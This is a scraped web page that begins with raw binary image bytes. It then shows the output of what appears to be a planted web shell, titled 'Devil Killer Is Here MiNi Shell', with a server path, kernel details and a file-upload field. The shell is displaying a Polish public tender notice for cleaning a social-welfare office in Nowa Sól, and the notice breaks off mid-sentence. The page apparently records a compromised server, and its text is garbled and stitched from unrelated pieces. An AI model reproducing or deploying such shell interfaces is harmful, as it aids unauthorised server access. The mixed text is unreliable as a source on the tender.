JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241115/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241115/0059760701-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> ŚWIADCZENIE USŁUGI SPRZĄTANIA BUDYNKU MIEJSKIEGO OŚRODKA POMOCY SPOŁECZNEJ W NOWEJ SOLI ORAZ POMIESZCZEŃ DZIENNEGO DOMU SENIOR + </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Miejski Ośrodek Pomocy Społecznej</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 006081695</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Staszica 1D</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Nowa Sól</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">67-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubuskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL432 - Zielonogórski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">685066300</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@mopsnowasol.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://mopsnowasol.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> ŚWIADCZENIE USŁUGI SPRZĄTANIA BUDYNKU MIEJSKIEGO OŚRODKA POMOCY SPOŁECZNEJ W NOWEJ SOLI ORAZ POMIESZCZEŃ DZIENNEGO DOMU SENIOR + </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5238dcfe-0417-418a-9ef5-72ef1a2bcd4b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00597607</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-11-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00015548/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.1 Świadczenie usług sprzątania dla Miejskiego Ośrodka Pomocy Społecznej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-5238dcfe-0417-418a-9ef5-72ef1a2bcd4b <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Platforma e-Zamównienia, który dostępna jest pod adresem:<br/>https://ezamowienia.gov.pl/<br/>− ePUAPu, dostępnego pod adresem https://epuap.gov.pl/wps/portal<br/>− poczty elektronicznej na adres sekretariat@mopsnowasol.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>wysyłania i odbierania korespondencji<br/>elektronicznej przekazywanej przy ich użyciu, opisane zostały w:<br/>− regulaminie korzystania z systemu e-Zamównienia dostępnym pod adresem<br/>https://e-zamównienial.uzp.gov.pl/komponent-edukacyjny/<br/>− warunkach korzystania z elektronicznej platformy usług administracji<br/>publicznej (ePUAP) dostępnych pod adresem<br/>https://www.gov.pl/web/gov/warunki-korzystania.<br/>Dokumenty, oświadczenia i informacje sporządza się w postaci elektronicznej,<br/>w formatach danych określonych w przepisach wydanych na podstawie art. 18<br/>ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów<br/>realizujących zadania publiczne (Dz.U. z 2023 r. poz. 57 z późn. zm.),<br/>z uwzględnieniem rodzaju przekazywanych danych.<br/>7. Maksymalny rozmiar plików przesyłanych za pośrednictwem dedykowanych<br/>formularzy: „Formularz złożenia, zmiany, wycofania oferty lub wniosku”<br/>i „Formularza do komunikacji” wynosi 150 MB.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zamawiający oświadcza, że spełnia wymogi określone w rozporządzeniu Parlamentu Europejskiego i Rady (UE) 2016/679 z 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie 2016 r.), dalej: RODO, tym samym dane osobowe podane przez wykonawcę będą przetwarzane zgodnie z RODO oraz zgodnie z przepisami krajowymi.<br/>2. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, zamawiający informuje, że:<br/>a. administratorem danych osobowych jest Miejski Ośrodek Pomocy<br/>Społecznej w Nowej Soli, ul. Stanisława Staszica 1D, 67- 100 Nowa Sól,<br/>b. w sprawach związanych z Pani/Pana danymi proszę kontaktować się<br/>z Inspektorem Ochrony Danych, kontakt pisemny za pomocą poczty<br/>tradycyjnej na adres: Miejski Ośrodek Pomocy Społecznej , 67-100 Nowa<br/>Sól, ul. Stanisława Staszica 1D; lub pocztą elektroniczną na adres e-mail:<br/>m.ziemianek@mopsnowasol.pl<br/>c. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit.<br/>c RODO w celu związanym z niniejszym postępowaniem o udzielenie<br/>zamówienia publicznego,<br/>d. odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym<br/>udostępniona zostanie dokumentacja postępowania,<br/>e. Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1<br/>ustawy Prawo zamówień publicznych przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy<br/>przekracza 4 lata, okres przechowywania obejmuje cały czas trwania<br/>umowy,<br/>f. obowiązek podania przez Panią/Pana danych osobowych bezpośrednio<br/>Ogłoszenie nr z dnia<br/>Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>Pani/Pana dotyczących jest wymogiem ustawowym określonym<br/>w przepisach ustawy Praw zamówień publicznych, związanym z udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje<br/>niepodania określonych danych wynikają z ustawy Prawo zamówień<br/>publicznych;<br/>g. w odniesieniu do Pani/Pana danych osobowych decyzje nie będą<br/>podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>h. posiada Pani/Pan:<br/>− na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana<br/>dotyczących;<br/>− na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych<br/>osobowych - skorzystanie z prawa do sprostowania nie może skutkować<br/>zmianą wyniku postępowania o udzielenie zamówienia publicznego ani zmianą<br/>postanowień umowy w zakresie niezgodnym z ustawą Prawo zamówień<br/>publicznych oraz nie może naruszać integralności protokołu oraz jego<br/>załączników,<br/>− na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa<br/>w art. 18 ust. 2 RODO – prawo do ograniczenia przetwarzania nie ma<br/>zastosowania w odniesieniu do przechowywania, w celu zapewnienia<br/>korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii<br/>Europejskiej lub państwa członkowskiego,<br/>− prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych,<br/>gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących<br/>narusza przepisy RODO;<br/>i. nie przysługuje Pani/Panu:<br/>− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych<br/>osobowych;<br/>− prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>− na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych<br/>osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych<br/>osobowych jest art. 6 ust. 1 lit. c RODO</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">OA.3201.2.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 200000,00 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Świadczenie usługi sprzątania budynku Miejskiego Ośrodka<br/>Pomocy Społecznej prz ul. Staszica 1 D w Nowej Soli oraz pomieszczeń<br/>Dziennego Domu „Senior +” przy ulicy Kasprowicza 12 w Nowej Soli </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90910000-9 - Usługi sprzątania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2025-01-01 do 2025-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Sposób oceny ofert.<br/>1) Cena oferty (C) – 1 punkt = 1 %.<br/>Ocenie podlega wskazana w formularzu oferty cena oferty brutto za wykonanie<br/>najniższa cena oferty spośród ofert<br/>niepodlegających odrzuceniu<br/>(liczba punktów oferty badanej) = ---------------------------- x 100<br/>cena oferty badanej<br/>Punkty zostaną przyznane z dokładnością do dwóch miejsc po przecinku.<br/>W przypadku złożenia oferty, której wybór prowadziłby do powstania obowiązku<br/>podatkowego zamawiającego, zgodnie z przepisami o podatku od towarów i usług<br/>w zakresie dotyczącym wewnątrzwspólnotowego nabycia towarów, zamawiający<br/>w celu oceny takiej oferty dolicza do przedstawionej w niej ceny podatek od<br/>towarów i usług, który miałby obowiązek wpłacić zgodnie z obowiązującymi<br/>przepisami. Tak obliczona kwota będzie podstawą obliczenia punktów w kryterium<br/>oceny ofert „cena oferty” Oferta może otrzymać maksymalnie 100 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia może ubiegać się wykonawca, który spełnia następujące<br/>warunki udziału w postępowaniu;<br/>1.1 zdolność techniczna lub zawodowa;<br/>Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże,<br/>że w okresie ostatnich trzech lat licząc wstecz od dnia, w którym upływa<br/>termin składania ofert, a jeżeli okres prowadzenia działalności jest krótszy –<br/>w tym okresie, wykonał należycie usługę polegającą na sprzątaniu przez okres<br/>trzech miesięcy pomieszczeń budynku o powierzchni minimum 500 m2 – w<br/>przypadku usług wykonywanych i jeszcze nie zakończonych, zamawiający<br/>uzna warunek za spełniony jeżeli wykonawca wykaże, że wykonywał<br/>zamówienie przez okres co najmniej trzech miesięcy.<br/>Uwagi:<br/>1) W przypadku, gdy podmiot trzeci, którego potencjałem wspiera się<br/>wykonawca realizował zamówienie, w zakres którego wchodziły usługi<br/>określone wyżej wspólnie z innym podmiotem, nie ubiegającym się<br/>o udzielenie zamówienia, zamawiający wymaga, aby podmiot trzeci<br/>udostępniający potencjał wykonawcy faktycznie wykonał usługę sprzątania<br/>pomieszczeń budynku o powierzchni 500 m2<br/>.<br/>2) W przypadku, gdy zamówienie, w zakres którego wchodziły usługi,<br/>o których mowa wyżej były realizowane przez wykonawcę wspólnie<br/>z innym podmiotem, nie ubiegającym się o udzielenie zamówienia,<br/>zamawiający wymaga, aby wykonawca składający ofertę w niniejszym<br/>postępowaniu faktycznie wykonał usługę sprzątania pomieszczeń budynku<br/>o powierzchni 500 m2 <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu,<br/>o niepodleganiu wykluczeniu z postępowania, w zakresie podstaw wykluczenia<br/>z postępowania wskazanych przez zamawiającego, sporządzonego zgodnie<br/>z wzorem stanowiącym załącznik nr 7 do SWZ,<br/>− w przypadku wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, oświadczenie składa każdy z wykonawców,<br/>− w przypadku, gdy wykonawca w celu wykazania spełniania warunków<br/>udziału w postępowaniu polega na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby, należy dołączyć oświadczenie podmiotu<br/>udostępniającego zasoby.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca jest<br/>zobowiązany złożyć oświadczenia i dokumenty: 1.1 oświadczenie wykonawcy o niepodleganiu wykluczeniu z postępowania,<br/>sporządzone zgodnie z wzorem stanowiącym załącznik nr 4 do SWZ,<br/>− w przypadku wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, oświadczenie składa każdy z wykonawców,− w przypadku, gdy wykonawca w celu wykazania spełniania warunków<br/>udziału w postępowaniu polega na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby, należy złożyć<br/>ponadto oświadczenie podmiotu udostępniającego zasoby, 1.2 oświadczenie wykonawcy o spełnianiu warunków udziału w<br/>postępowaniu, -sporządzone zgodnie z wzorem stanowiącym załącznik nr 5 do SWZ, w przypadku wykonawców wspólnie<br/>ubiegających się o udzielenie zamówienia, oświadczenie składa każdy z wykonawców w zakresie, w jakim każdy z wykonawców<br/>wykazuje spełnianie warunków udziału w postępowaniu, w przypadku, gdy wykonawca w celu wykazania spełniania warunków<br/>udziału w postępowaniu polega na zdolnościach technicznych lub zawodowych podmiotów udostępniających zasoby, należy złożyć<br/>ponadto oświadczenie podmiotu udostępniającego zasoby o spełnianiu warunków udziału w postępowaniu w zakresie, w jakim<br/>wykonawca powołuje się na jego zasoby, 1.3 w celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do<br/>jego reprezentowania, odpis lub informację z KRS, CEIDG<br/>− w przypadku wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, dokumenty składa każdy z wykonawców,<br/>− w przypadku, gdy wykonawca w celu wykazania spełniania warunków<br/>udziału w postępowaniu polega na zdolnościach technicznych lub<br/>zawodowych podmiotów udostępniających zasoby, należy złożyć<br/>dodatkowo dokumenty dotyczące tego podmiotu.<br/>Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa<br/>wyżej, jeżeli zamawiający może je uzyskać za pomocą bezpłatnych<br/>i ogólnodostępnych baz danych, o ile wykonawca wskazał dane umożliwiające<br/>dostęp do tych dokumentów w oświadczeniu, którego wzór stanowi<br/>załącznik nr 4 do SWZ.<br/>1.4 pełnomocnictwo lub inny dokument potwierdzający umocowanie<br/>do reprezentowania wykonawcy jeżeli w imieniu wykonawcy działa osoba,<br/>której umocowanie do jego reprezentowania nie wynika z dokumentów,<br/>o których mowa w pkt 1.3,<br/>− w przypadku wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, dokumenty składa każdy z wykonawców,<br/>− w przypadku, gdy wykonawca w celu wykazania spełniania warunków<br/>udziału w postępowaniu polega na zdolnościach technicznych lub<br/>zawodowych podmiotów udostępniających zasoby, należy złożyć ponadto<br/>dokumenty dotyczące tego podmiotu, jeżeli w imieniu tego podmiotu<br/>działa osoba, której umocowanie do jego reprezentowania nie wynika<br/>z dokumentów, o których mowa w pkt 1.3.<br/>2. W przypadku wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, wykonawca jest zobowiązany złożyć wraz z ofertą oświadczenia<br/>i dokumenty, o których mowa w pkt 1 oraz dodatkowo następujące oświadczenia i dokumenty:<br/>2.1 oświadczenie, z którego wynika, które usługi wykonają poszczególni<br/>wykonawcy, określające zakres jaki wykona każdy z wykonawców wspólnie<br/>ubiegających się o zamówienie, sporządzone zgodnie z wzorem stanowiącym<br/>załącznik nr 6 do SWZ – oświadczenie składa pełnomocnik w imieniu<br/>wszystkich wykonawców wspólnie ubiegających się o zamówienie,<br/>2.2 pełnomocnictwo do reprezentowania wykonawcy wspólnie ubiegającego się o zamówienie w postępowaniu o udzielenie<br/>zamówienia albo reprezentowania w postępowaniu i zawarcia umowy.<br/>3. W przypadku, gdy wykonawca w celu wykazania spełniania warunków<br/>udziału w postępowaniu polega na zdolnościach technicznych lub<br/>zawodowych podmiotów udostępniających zasoby, wykonawca jest<br/>zobowiązany złożyć wraz z ofertą oświadczenia i dokumenty, o których mowa<br/>w pkt 1 oraz dodatkowo następujące oświadczenia i dokumenty:<br/>3.1 zobowiązanie podmiotu udostępniającego zasoby do oddania wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Wykonawca, którego oferta została najwyżej oceniona, jest<br/>zobowiązany do złożenia w wyznaczonym terminie, nie krótszym niż<br/>5 dni od dnia wezwania zamawiającego, aktualnych na dzień składania<br/>następujących oświadczeń lub dokumentów:<br/><br/>1) Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o niepodleganiu wykluczeniu z postępowania, w zakresie podstaw wykluczenia z postępowania wskazanych przez zamawiającego, sporządzonego zgodniez wzorem stanowiącym załącznik nr 7 do SWZ,<br/>− w przypadku wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia, oświadczenie składa każdy z wykonawców,<br/>− w przypadku, gdy wykonawca w celu wykazania spełniania warunków<br/>udziału w postępowaniu polega na zdolnościach lub sytuacji podmiotów<br/>udostępniających zasoby, należy dołączyć oświadczenie podmiotu<br/>udostępniającego zasoby.<br/>2) wykazu usług wykonanych, a w przypadku świadczeń powtarzających się lub<br/>ciągłych również wykonywanych, w okresie ostatnich 3 lat licząc wstecz od<br/>dnia, w którym upływa termin składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie, wraz z podaniem ich przedmiotu, dat<br/>wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są<br/>wykonywane, oraz załączeniem dowodów określających, czy te usługi zostały<br/>wykonane lub są wykonywane należycie, przy czym dowodami, o których<br/>mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na<br/>rzecz którego usługi zostały wykonane, a w przypadku świadczeń<br/>powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca<br/>z przyczyn niezależnych od niego nie jest w stanie 